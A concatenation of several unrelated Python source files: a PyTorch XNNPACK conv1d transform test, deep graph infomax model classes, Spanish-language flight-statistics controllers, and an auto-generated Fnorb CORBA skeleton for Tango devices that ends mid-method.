stride_list = range(1, 3)
padding_list = range(0, 3)
dilation_list = range(1, 3)
for hparams in itertools.product(batch_size_list,
input_channels_per_group_list,
width_list,
output_channels_per_group_list,
groups_list,
kernel_list,
stride_list,
padding_list,
dilation_list):
batch_size, input_channels_per_group, width, output_channels_per_group, \
groups, kernel, stride, padding, dilation = hparams
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
conv_weight_shape = (output_channels, input_channels_per_group, kernel)
conv_bias_shape = (output_channels,)
class Conv1D(torch.nn.Module):
def __init__(self):
super(Conv1D, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
return F.conv1d(x, self.weight, self.bias,
self.stride, self.padding, self.dilation, self.groups)
data_shape = (batch_size, input_channels, width)
pattern_count_transformed_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": 1}
pattern_count_optimized_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack" : -1,
"prepacked::conv2d_clamp_run": 1}
TestXNNPACKConv1dTransformPass.validate_transform_conv1d_to_conv2d(Conv1D(),
pattern_count_transformed_map,
pattern_count_optimized_map,
data_shape)
# See https://github.com/pytorch/pytorch/issues/46066
@slowTest
def test_conv1d_with_relu_fc(self):
batch_size_list = range(1, 3)
input_channels_per_group_list = range(10, 12)
width_list = range(10, 12)
output_channels_per_group_list = range(10, 12)
groups_list = range(1, 3)
kernel_list = range(1, 4)
stride_list = range(1, 3)
padding_list = range(0, 3)
dilation_list = range(1, 3)
output_features_list = range(1, 3)
for hparams in itertools.product(batch_size_list,
input_channels_per_group_list,
width_list,
output_channels_per_group_list,
groups_list,
kernel_list,
stride_list,
padding_list,
dilation_list,
output_features_list):
batch_size, input_channels_per_group, width, output_channels_per_group, \
groups, kernel, stride, padding, dilation, output_features = hparams
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
conv_weight_shape = (output_channels, input_channels_per_group, kernel)
conv_bias_shape = (output_channels,)
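# Standard 1-d convolution output length:
# floor((width + 2*padding - dilation*(kernel - 1) - 1) / stride) + 1
# e.g. width=10, padding=1, kernel=3, dilation=1, stride=1 -> 10.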
conv_output_width = int((width + 2 * padding - dilation * (kernel - 1) - 1) / stride) + 1
fc_weight_shape = (output_features, output_channels * conv_output_width)
fc_bias_shape = (output_features,)
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv_weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.conv_bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.fc_weight = torch.nn.Parameter(torch.Tensor(torch.rand(fc_weight_shape)), requires_grad=False)
self.fc_bias = torch.nn.Parameter(torch.Tensor(torch.rand(fc_bias_shape)), requires_grad=False)
def forward(self, x):
x = F.conv1d(x, self.conv_weight, self.conv_bias,
self.stride, self.padding, self.dilation, self.groups)
x = F.relu(x)
x = x.view(x.size(0), -1)
x = F.linear(x, self.fc_weight, self.fc_bias)
return x
data_shape = (batch_size, input_channels, width)
pattern_count_transformed_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": 1}
pattern_count_optimized_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack" : -1,
"prepacked::conv2d_clamp_run": 1}
TestXNNPACKConv1dTransformPass.validate_transform_conv1d_to_conv2d(Net(),
pattern_count_transformed_map,
pattern_count_optimized_map,
data_shape)
if __name__ == "__main__":
run_tests()
# ==== model/models.py | dingdanhao110/Conch | Python | MIT | 15,342 bytes ====
import torch
import torch.nn as nn
from torch.nn import functional as F
from model.layers import BaseConch, BaseConchNc, BaseConchRd, AvgReadout, Discriminator, BaseConchGS, CLING_HAN
class conch_dgi(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout=0,
bias=False,):
super(conch_dgi, self).__init__()
self.dropout = dropout
self.gcn = BaseConch(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.disc = Discriminator(self.gcn.output_dim)
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=False):
h_1 = self.gcn(feat1)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
output, weights = self.mp_agg(h_1)
output = self.fc(output)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed:
return preds
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, weights, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
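# The classes below are variants of the same DGI recipe used by conch_dgi:
# encode two inputs with a shared encoder, summarise the first view as
# c = sigmoid(readout(h_1)), and let the discriminator contrast (c, h_1)
# against (c, h_2) to produce the self-supervised term `reg`.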
class conch_dgi2(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(conch_dgi2, self).__init__()
self.dropout = dropout
self.shuffle = shuffle
self.gcn = BaseConch(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.disc = Discriminator(self.mp_agg.output_dim)
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(feat1,shuffle=False)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed == 'embed':
return h_1
if get_embed == 'pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2, shuffle=self.shuffle)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, None, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class conch_dgi_gs(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(conch_dgi_gs, self).__init__()
self.dropout = dropout
self.shuffle = shuffle
self.gcn = BaseConchGS(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.disc = Discriminator(self.mp_agg.output_dim)
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, ids, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(ids,feat1,shuffle=False)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed == 'embed':
return h_1
if get_embed == 'pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(ids,feat2, shuffle=self.shuffle)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, None, reg
def get_embed(self, ids, feat1):
h_1 = self.gcn(ids,feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class hdgi_gs(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(hdgi_gs, self).__init__()
self.dropout = dropout
self.shuffle = shuffle
self.gcn = CLING_HAN(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.disc = Discriminator(self.mp_agg.output_dim)
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, ids, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(ids,feat1)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed == 'embed':
return h_1
if get_embed == 'pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(ids,feat2)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, None, reg
def get_embed(self, ids, feat1):
h_1 = self.gcn(ids,feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class conch_nc(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(conch_nc, self).__init__()
self.dropout = dropout
self.gcn = BaseConchNc(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
# Re-enabled: forward() below uses read/sigm/disc for the DGI regulariser,
# so leaving these commented out would raise AttributeError at runtime.
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.disc = Discriminator(self.gcn.output_dim)
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
self.shuffle = shuffle
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(feat1)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed == 'embed':
return h_1
if get_embed == 'pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, weights, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
h_1, weights = self.mp_agg(h_1)
# output = self.fc(output)
return h_1
def get_predict(self, feat1):
h_1 = self.gcn(feat1)
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
return output
class conch_rd(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
K,
shuffle = False,
attn_dropout=0,
bias=False,):
super(conch_rd, self).__init__()
self.dropout = dropout
self.gcn = BaseConchRd(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
K,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.disc = Discriminator(self.gcn.output_dim)
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
self.shuffle = shuffle
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(feat1,shuffle=False)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed:
return preds
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2,shuffle=self.shuffle)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, weights, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
# ==== controllers/vuelos salientes amadeus_controller.py | SergioCMDev/Busines-Inteligence-applied-to-tourism | Python | Apache-2.0 | 10,593 bytes ====
from ..DB.Repositorio_Vuelos_Salientes_Amadeus import BDRepositorioVuelosSalientesAmadeus as DBRepository
from ..Utilidades.Conversores import Conversores as Conversor
def obtener_cantidad_anual(PaisOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais durante un rango de años
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais durante un rango de años
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusAnualmenteDadoPaisOrigenAnioMinMax(PaisOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
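# Hedged usage sketch: every controller in this module follows the same
# pipeline (repository query -> cursor -> tuples -> matrix -> JSON).
# Hypothetical call with illustrative argument values:
# data = obtener_cantidad_anual("ES", 2015, 2018)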
def obtener_cantidad_ciudad_mensual_rango_anios(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años organizado mensualmente
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años organizado mensualmente
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param CiudadOrigen: Ciudad de la que salen los vuelos
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusMensualmenteDadoPaisOrigenCiudadOrigenAnioMinMax(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
# print(arrayTuplas)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
# print(arrayTuplas)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_ciudad_mes_rango_anios(PaisOrigen, CiudadOrigen, Mes, AnioInicio, AnioFin): #OK
"""
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años durante un mes
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años durante un mes
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param CiudadOrigen: Ciudad de la que salen los vuelos
:type CiudadOrigen: str
:param Mes: Mes
:type Mes: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusEnUnMesDadoPaisOrigenCiudadOrigenMesAnioMinMax(PaisOrigen, CiudadOrigen, Mes, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_ciudades_mensual_rango_anios(PaisOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años dividiendo por meses
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años dividiendo por meses
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusDadoPaisOrigenAnioMinMaxSeparadoPorCiudadesMensualmente(PaisOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output (alternative, kept for reference)
# matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
# retval = conversor.ObtenerDataJSONExtendido(matriz)
#
# return retval
## Reduced JSON output
retval = conversor.convertirAJson(arrayTuplas)
return retval
def obtener_cantidad_ciudades_rango_anios(PaisOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusDadoPaisOrigenAnioMinMaxSeparadoPorCiudades(PaisOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output (alternative, kept for reference)
# matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
# retval = conversor.ObtenerDataJSONExtendido(matriz)
#
# return retval
## Reduced JSON output
retval = conversor.convertirAJson(arrayTuplas)
return retval
def obtener_cantidad_mensualmente_en_anio(PaisOrigen, Anio): #OK
"""
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año de forma mensual
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año de forma mensual
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusEnUnAnioDadoPaisOrigenAnioMensualmente(PaisOrigen, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_mes_en_rango_anios(PaisOrigen, Mes, AnioInicio, AnioFin): #OK
"""
Dado un pais origen, un mes y un rango de años obtiene la cantidad de vuelos salientes durante ese rango de años en ese mes
Dado un pais origen, un mes y un rango de años obtiene la cantidad de vuelos salientes durante ese rango de años en ese mes
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param Mes: Mes
:type Mes: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: AnioFin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusAnualmenteEnUnMesDadoPaisOrigenMesAnioMinMax(PaisOrigen, Mes, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_vuelos_salientes_ciudades_en_anio(PaisOrigen, Anio): #OK
"""
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año dividiendo por ciudades
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año dividiendo por ciudades
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusEnUnAnioDadoPaisOrigenAnioSeparandoPorCiudades(PaisOrigen, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_vuelos_salientes_ciudad_rango_anios(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param CiudadOrigen: Ciudad de la que salen los vuelos
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusDadoPaisOrigenCiudadOrigenAnioMinMax(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
## Extended JSON output
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
## Reduced JSON output (alternative, kept for reference)
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
# ==== src/hapPyTango/Tango_skel/__init__.py | mguijarr/hapPyTango | Python | MIT | 32,782 bytes ====
""" Module: IDL:Tango:1.0
Automagically generated by:-
The ORB called Fnorb v1.1.Return.of.Fnorb
"""
_FNORB_ID = "IDL:Tango:1.0"
# Fnorb modules.
import Fnorb.orb.CORBA
import Fnorb.orb.TypeManager
import Fnorb.orb.Util
class Device_skel(Fnorb.orb.CORBA.Object_skel):
""" Interface: IDL:Tango/Device:1.0 """
_FNORB_ID = "IDL:Tango/Device:1.0"
def _skel__get_name(self, server_request):
""" Attribute: IDL:Tango/Device/name:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_name()
# Create the reply.
server_request.results(results)
return
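# Every generated skeleton method below follows the same protocol: build the
# input/output/exception typecodes, initialise the server request, unmarshal
# any arguments, invoke the implementation, and marshal the results back.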
def _skel__get_description(self, server_request):
""" Attribute: IDL:Tango/Device/description:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_description()
# Create the reply.
server_request.results(results)
return
def _skel__get_state(self, server_request):
""" Attribute: IDL:Tango/Device/state:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevState:1.0"))
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_state()
# Create the reply.
server_request.results(results)
return
def _skel__get_status(self, server_request):
""" Attribute: IDL:Tango/Device/status:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_status()
# Create the reply.
server_request.results(results)
return
def _skel__get_adm_name(self, server_request):
""" Attribute: IDL:Tango/Device/adm_name:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_adm_name()
# Create the reply.
server_request.results(results)
return
def _skel_command_inout(self, server_request):
""" Operation: IDL:Tango/Device/command_inout:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
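# (apply(f, args) is Python 2 syntax; the Python 3 equivalent is f(*args).)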
results = apply(self.command_inout, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_get_attribute_config(self, server_request):
""" Operation: IDL:Tango/Device/get_attribute_config:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.get_attribute_config, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_set_attribute_config(self, server_request):
""" Operation: IDL:Tango/Device/set_attribute_config:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.set_attribute_config, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attributes(self, server_request):
""" Operation: IDL:Tango/Device/read_attributes:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
